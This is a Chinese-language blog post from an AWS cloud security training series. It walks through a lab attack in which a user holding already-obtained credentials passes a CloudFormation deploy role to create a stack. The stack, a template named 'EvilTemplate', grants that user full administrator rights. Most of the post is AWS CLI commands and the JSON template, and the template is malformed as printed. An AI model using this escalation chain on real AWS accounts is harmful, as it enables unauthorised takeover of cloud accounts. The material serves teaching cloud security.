AWS云安全系列10 - IAM CloudFormation
2022-4-28 11:14:53 Author: mp.weixin.qq.com(查看原文) 阅读量:8 收藏

国内云安全培训请点击原文或访问以下链接

https://www.yuque.com/u8047536/supvqp/ri4ft0

前提是已经获取了相关的密钥

步骤 1:将 AWS CLI配置为访问凭证

步骤 2:列出附加到用户的 AWS 托管策略

aws iam list-attached-user-policies --user-name xx aws iam list-user-policies --user-name xx

步骤 3:尝试在AWS账户上创建用户。

aws iam create-user --user-name Bob

由于权限不足,用户创建失败

步骤 4: 查看策略权限和详细信息

aws iam get-user-policy --user-name xx student --policy-name terraform-20210213071506259200000001

 xx用户可以  执行各种云表单操作

步骤 5:列出 AWS 账户上可传递给 CloudFormation 服务的角色

aws iam list roles

步骤 6: 查看 lab12CFDeploy角色的详细信息

aws iam list-role-policies --role-name lab12CFDeployRoleaws iam get-role-policy --role-name lab12CFDeployRole --policy-name terraform-20210213071506289900000002

步骤 7:创建包含以下内容的 JSON 文件

{  "Resources": {    "EvilTemplate": {      "Type": "AWS::IAM::Policy",      "Properties": {        "PolicyName": "admin_policy",        "PolicyDocument": {          "Version": "2012-10-17",
"Statement": []
{ "Effect": "Allow", "Action": "*", "Resource": "*" }
}, "Users": [ "xx" ] } } }}

步骤 8:借助创建的 JSON 文件,在AWS 账户上创建新的cloudformation stack

aws cloudformation create-stack --stack-name ad-stack --template-body file://new_policy.json --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::1xxxxxxx4:role/lab12CFDeployRole

步骤 9:  检查stack信息并检查stack执行事件状态

aws cloudformation describe-stacks --stack-name ad-stackaws cloudformation describe-stack-events --stack-name ad-stack

已成功执行stack

步骤 10:检查 xx用户的用户策略

aws iam list-user-policies --user-name xx

第 11 步:查看admin_policy的详细信息

aws iam get-user-policy --user-name xx --policy-name admin_policy

步骤 12:尝试AWS 账户 上创建新用户以验证管理员访问权限

 aws iam create-user --user-name Bob

已成功执行特权操作

1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)


文章来源: http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651868019&idx=1&sn=313099fb9d7862deac7fca962bc6b4e2&chksm=8442b394b3353a822eb0f7672cf5dc1591e7b291789659848ece8ee16c6a6f3096156d5de558#rd
如有侵权请联系:admin#unsafe.sh